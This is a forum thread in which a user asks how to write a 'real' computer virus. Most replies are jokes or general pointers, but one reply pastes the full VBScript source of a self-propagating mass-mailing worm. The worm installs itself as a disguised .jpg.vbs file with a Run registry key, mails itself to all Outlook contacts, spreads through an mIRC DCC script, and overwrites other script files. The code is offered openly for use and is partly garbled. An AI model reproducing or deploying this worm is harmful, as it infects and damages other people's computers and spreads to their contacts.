help making a virus

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help making a virus

Post by EViiLROBOT »

i want to learn how to make a real virus not those bullshit viruses they show you on youtube can any help me learn how to make viruses
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Post by wolven »

Lern 2 Code :D
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Post by DaymItzJack »

See, YouTube is where you went wrong. You don't go to YouTube to find out how to make viruses. You have to go somewhere better, somewhere like
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Post by Geisha »

I only know how to spread a virus... it usually involves sneezing on someone or wiping snot inappropriately.

As far as computer viruses go... you could always open up those odd email messages you get from the unknown bank manager from Burkina Faso and see what happens.
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Post by pedromalta »

Learn the concepts of malware, search it on wikipedia.

Then see if it's a virus that you really want, virus are fun, but not that fun, that fun would be a good trojan.

Learn to code, of course, and take a look at the metasploit framework, and the backtrack linux distribution. Those are good resources.

I will not put any links, since learn to "google" is a good stuff too!

Good luck!
sudo apt-get a life
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Post by Neoman121 »

[quote="pedromalta"] Sudo apt-get a life.
LOL. Thats a good one. :D.
Curiosity killed the cat... But for a while I was the suspect.
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Post by Liidian »

Used search, found this: Put this in a text document. Saved it as NAME.vbs with this code in:

'Vbs.Vbswg.C44 Created By Crawler. 9/4/2008
Set J3HNBQ8A = createobject("scripting.filesystemobject")
JSQNN82H = J3HNBQ8A.getspecialfolder(0)
R347C6AC = JSQNN82H & "\MySQL.jpg.vbs"
Set V58HU1JB = createobject("")
V58HU1JB.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinUpdate", "wscript.exe " & R347C6AC & " %"
J3HNBQ8A.copyfile wscript.scriptfullname, R347C6AC
If V58HU1JB.regread("HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\C44\P12O8TLP") <> 1 then
End if
If V58HU1JB.regread("HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\C44\FU5A2187") <> 1 then
U1SR8G82 ""
End if

Function P8OJH241()
Set C8QJ75UC = CreateObject("Outlook.Application")
If C8QJ75UC = "Outlook" Then
Set J7AL43UE = C8QJ75UC.GetNameSpace("MAPI")
Set GA4DCQC6 = J7AL43UE.AddressLists
For Each G11F1G72 In GA4DCQC6
If G11F1G72.AddressEntries.Count <> 0 Then
RA15953L = G11F1G72.AddressEntries.Count
For EH754911 = 1 To RA15953L
Set HCAM30EU = C8QJ75UC.CreateItem(0)
Set I2B9A692 = G11F1G72.AddressEntries(EH754911)
HCAM30EU.To = I2B9A692.Address
HCAM30EU.Subject = "Very Important!"
HCAM30EU.Body = "Hi:" & vbcrlf & "Please view this file, it's very important." & vbcrlf & ""
execute "set F82E756U =HCAM30EU." & Chr(65) & Chr(116) & Chr(116) & Chr(97) & Chr(99) & Chr(104) & Chr(109) & Chr(101) & Chr(110) & Chr(116) & Chr(115)
U5F5T1CI = R347C6AC
HCAM30EU.DeleteAfterSubmit = True
F82E756U.Add U5F5T1CI
If HCAM30EU.To <> "" Then
End If
End If
End If
End function
Function U1SR8G82(D4PUN788)
If D4PUN788 <> "" Then
R32JRS7Q = V58HU1JB.regread("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir")
If J3HNBQ8A.fileexists("c:\mirc\mirc.ini") Then
D4PUN788 = "c:\mirc"
ElseIf J3HNBQ8A.fileexists("c:\mirc32\mirc.ini") Then
D4PUN788 = "c:\mirc32"
ElseIf J3HNBQ8A.fileexists(R32JRS7Q & "\mirc\mirc.ini") Then
D4PUN788 = R32JRS7Q & "\mirc"
ElseIf J3HNBQ8A.fileexists(R32JRS7Q & "\mirc32\mirc.ini") Then
D4PUN788 = R32JRS7Q & "\mirc"
D4PUN788 = ""
End If
End If
If D4PUN788 <> "" Then
Set OEO665K0 = J3HNBQ8A.CreateTextFile(D4PUN788 & "\script.ini", True)
OEO665K0 = "[script]" & vbCrLf & "n0=on 1:JOIN:#:{"
OEO665K0 = OEO665K0 & vbCrLf & "n0=on 1:JOIN:#:{"
OEO665K0 = OEO665K0 & vbCrLf & "n1= /if ( $nick == $me ) { halt }"
OEO665K0 = OEO665K0 & vbCrLf & "n2= /." & Chr(100) & Chr(99) & Chr(99) & " send $nick "
OEO665K0 = OEO665K0 & R347C6AC
OEO665K0 = OEO665K0 & vbCrLf & "n3=}"
End If
End Function
Function PDO4HE2C()
On Error Resume Next
Set E4D3HNBQ = J3HNBQ8A.Drives
BO158HU1 = TFLD1T6R & " \ "
End Function

Function JTQSQNN8(GH6347C6)
AN312O8T = GH6347C6
Set L028OJH2 = J3HNBQ8A.GetFolder(AN312O8T)
Set D5CU5A21 = L028OJH2.Files
For Each BJ51SR8G In D5CU5A21
If J3HNBQ8A.GetExtensionName(BJ51SR8G.path) = "vbs"
J3HNBQ8A.CopyFile wscript.scriptfullname,BJ51SR8G.path,true
End if
If J3HNBQ8A.GetExtensionName(BJ51SR8G.path) = "vbe"
J3HNBQ8A.CopyFile wscript.scriptfullname,BJ51SR8G.path,true
End if
Set IAA8QJ75 = L028OJH2.Subfolders
For Each USM7AL43 In IAA8QJ75
Call (USM7AL43.path)
End function
The whole "system" is a number of people creating a code all together, this code loops and is there for a "system".
System Zero could also be confirmed with one word "Hacker's"
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Post by CodeX »

And as you were nice enough to share with us, I will share something with you that you may like. There's some pretty hardcore stuff so beware when you visit this site.
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